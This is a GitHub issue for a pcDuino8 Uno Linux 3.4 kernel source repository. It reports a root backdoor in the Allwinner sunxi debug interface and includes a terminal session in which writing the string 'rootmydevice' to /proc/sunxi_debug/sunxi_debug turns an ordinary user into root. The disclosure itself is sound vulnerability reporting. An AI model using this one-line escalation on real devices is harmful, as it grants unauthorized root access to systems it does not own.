Local privileges escalation

pcduino / pcduino8-uno-kernel

Linux 3.4.39 kernel source for pcDuino8 Uno

7 stars 10 forks source link

Local privileges escalation #3

Open ThomasKaiser opened 8 years ago

ThomasKaiser commented 8 years ago

Please check and fix:

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)

ThomasKaiser commented 8 years ago

Congratulations. By ignoring this that long you might also get some individual media attention soon: http://www.theregister.co.uk/2016/05/09/allwinners_allloser_custom_kernel_has_a_nasty_root_backdoor/

YaoQ commented 8 years ago

Thanks for you report!

MACscr commented 6 years ago

yet doesnt look like they have done anything about it even though its been reported. =(